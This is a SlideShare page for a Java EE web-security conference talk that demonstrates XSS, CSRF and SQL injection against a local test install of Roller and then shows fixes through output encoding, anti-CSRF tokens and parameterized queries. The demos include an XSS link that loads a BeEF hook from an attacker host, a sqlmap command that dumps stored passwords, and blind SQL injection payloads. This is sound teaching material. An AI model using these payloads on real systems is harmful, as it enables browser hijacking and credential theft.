Java EE Web Security By Example: Frank Kim

1,817 views

Published on

Learn how to exploit security vulnerabilities that are commonly found in the arsenal of malicious attackers. We won't simply talk about issues like XSS, CSRF and SQL Injection, but will have live demos showing how hackers exploit these potentially devastating defects using freely available tools. You'll see how to hack a real world open source application and explore bugs in commonly used open source frameworks. We also look at the source code and see how to fix these issues using secure coding principles. We will also discuss best practices that can be used to build security into your SDLC. Java developers and architects will learn how to find and fix security issues in their applications before hackers do.

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,817
On SlideShare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
147
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Java EE Web Security By Example: Frank Kim

  1. 1. Java EE Web Security By Example JAX 2012
  2. 2. About•  Frank Kim –  Consultant, ThinkSec –  Author, SANS Secure Coding in Java/JEE –  SANS Application Security Curriculum Lead Java EE Web Security By Example 2
  3. 3. What You Should Know•  Hacking is not hard•  Don’t trust any data – Assume that your users are evil! Java EE Web Security By Example 3
  4. 4. Outline•  Web App Attack Refresher –  XSS, CSRF, SQL Injection•  Testing –  Hacking an open source app•  Secure Coding –  Fixing security bugs Java EE Web Security By Example 4
  5. 5. Cross-Site Scripting (XSS)•  Occurs when unvalidated data is displayed back to the browser•  Types of XSS – Stored – Reflected – Document Object Model (DOM) based Java EE Web Security By Example 5
  6. 6. Cross-Site Request Forgery (CSRF) Java EE Web Security By Example 6
  7. 7. SQL Injection (SQLi)•  Occurs when dynamic SQL queries are used –  By injecting arbitrary SQL commands, attackers can extend the meaning of the original query –  Can potentially execute any SQL statement on the database•  Very powerful –  #1 on CWE/SANS Top 25 Most Dangerous Software Errors –  #1 on OWASP Top 10 Java EE Web Security By Example 7
  8. 8. Outline•  Web App Attack Refresher –  XSS, CSRF, SQL Injection•  Testing –  Hacking an open source app•  Secure Coding –  Fixing security bugs Java EE Web Security By Example 8
  9. 9. What are We Testing?•  Installation of Roller 3.0•  Fake install of SANS AppSec Street Fighter Blog•  Want to simulate the actions that a real attacker might take –  There are definitely other avenues of attack –  Were walking through one attack scenario Java EE Web Security By Example 9
  10. 10. Attack Scenario1)  XSS to control the victims browser2)  Combine XSS and CSRF to conduct a privilege escalation attack - Use escalated privileges to access another feature3)  Use SQL Injection to access the database directly Java EE Web Security By Example 10
  11. 11. Spot the Vuln - XSS Java EE Web Security By Example 11
  12. 12. XSS in head.jspJava EE Web Security By Example 12
  13. 13. Testing the "look" Param•  Admin pages include head.jsp•  The param is persistent for the session Java EE Web Security By Example 13
  14. 14. XSS Exploitation•  Introducing BeEF –  Browser Exploitation Framework –  http://www.bindshell.net/tools/beef•  Uses XSS to hook the victims browser –  Log user keystrokes, view browsing history, execute JavaScript, etc –  Advanced attacks - Metasploit integration, browser exploits, etc Java EE Web Security By Example 14
  15. 15. XSS Exploitation Overview 1) Sends link with evil BeEF script http://localhost:8080/roller/roller-ui/yourWebsites.do?look="><script src="http://www.attacker.com/beef/hook/beefmagic.js.php"></script> 2) Victim clicks evil linkAttacker Victim 3) Victims browser sends data to attacker Java EE Web Security By Example 15
  16. 16. BeEF XSS Demo
  17. 17. Spot the Vuln - CSRF Java EE Web Security By Example 17
  18. 18. CSRF in UserAdmin.jsp Want to useCSRF to change this field Java EE Web Security By Example 18
  19. 19. CSRF Demo
  20. 20. Spot the Vuln – SQL Injection Java EE Web Security By Example 20
  21. 21. SQL Injection in UserServletJava EE Web Security By Example 21
  22. 22. SQL Injection Testing• UserServlet is vulnerable to SQLi http://localhost:8080/roller/roller-ui/authoring/user No results Java EE Web Security By Example 22
  23. 23. Exploiting SQL Injection•  Introducing sqlmap –  http://sqlmap.sourceforge.net•  Tool that automates detection and exploitation of SQL Injection vulns –  Supports MySQL, Oracle, PostgreSQL, MS SQL Server –  Supports blind, inband, and batch queries –  Fingerprint/enumeration - dump db schemas, tables/ column names, data, db users, etc –  Takeover features - read/upload files, exec arbitrary commands, exec Metasploit shellcode, etc Java EE Web Security By Example 23
  24. 24. sqlmap SyntaxŸ Dump userids and passwordspython sqlmap.py -u "http://localhost:8080/roller/roller-ui/ authoring/user?startsWith=f%25" --cookie "username=test; JSESSIONID==<INSERT HERE>" --drop-set-cookie -p startsWith --dump -T rolleruser -C username,passphrase -v 2 Java EE Web Security By Example 24
  25. 25. SQL Injection Demo
  26. 26. How it Worksf% AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 103 AND neEy LIKE neEyf% AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 104 AND neEy LIKE neEyf% AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 105 AND neEy LIKE neEy Java EE Web Security By Example 26
  27. 27. Step By Step [0]SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1;returns ilovethetajmahal Java EE Web Security By Example 27
  28. 28. Step By Step [1]select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1);returns iselect MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1);returns lselect MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1);returns o Java EE Web Security By Example 28
  29. 29. Step By Step [2]select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1));returns 105select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1));returns 108select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1));returns 111 Java EE Web Security By Example 29
  30. 30. Attack Summary1)  XSS to control the victims browser2)  Combine XSS and CSRF to conduct a privilege escalation attack - Use escalated privileges to access another feature3)  Use SQL Injection to access the database directly Java EE Web Security By Example 30
  31. 31. Outline•  Web App Attack Refresher –  XSS, CSRF, SQL Injection•  Testing –  Hacking an open source app•  Secure Coding –  Fixing security bugs Java EE Web Security By Example 31
  32. 32. Data ValidationInbound Data Should I be consuming this? Validation Encoding Outbound Data Validation Application Data Store Inbound Data Encoding Validation Should I be emitting this? Outbound Data Java EE Web Security By Example 32
  33. 33. Output Encoding•  Encoding –  Convert characters so they are treated as data and not special characters•  Must escape differently depending where data is displayed on the page•  XSS Prevention Cheat Sheet http://www.owasp.org/index.php/ XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sh eet Java EE Web Security By Example 33
  34. 34. Fix XSS in head.jsp•  Add URL encoding<link rel="stylesheet" type="text/css" media="all" href="<%= request.getContextPath() %>/roller-ui/theme/<%= ESAPI.encoder().encodeForURL(theme) %>/ colors.css" /> Java EE Web Security By Example 34
  35. 35. Fix CSRF in Update User Functionality• UserAdmin.jsp – Add anti-CSRF token<input type="hidden" name=<%= CSRFTokenUtil.SESSION_ATTR_KEY %> value=<%= CSRFTokenUtil.getToken(request.getSession(false)) %> >• UserAdminAction.java – Check anti-CSRF token if (!CSRFTokenUtil.isValid(req.getSession(false), req)){ return mapping.findForward("error"); } Java EE Web Security By Example 35
  36. 36. Fix SQL Injection in UserServlet.java•  Use parameterized queries correctlyif (startsWith == null || startsWith.equals("")) { query = "SELECT username, emailaddress FROM rolleruser"; stmt = con.prepareStatement(query);} else { query = "SELECT username, emailaddress FROM rolleruser WHERE username like ? or emailaddress like ?"; stmt = con.prepareStatement(query); stmt.setString(1, startsWith + "%"); stmt.setString(2, startsWith + "%");}rs = stmt.executeQuery(); Java EE Web Security By Example 36
  37. 37. Building Secure SoftwareSource: Microsoft SDL Java EE Web Security By Example 37
  38. 38. Remember•  Hacking is not hard•  Don’t trust any data –  Validate input –  Encode output –  Use CSRF tokens –  Use parameterized queries Java EE Web Security By Example 38
  39. 39. Thanks!Frank Kimfrank@thinksec.com @sansappsec Java EE Web Security By Example 40

×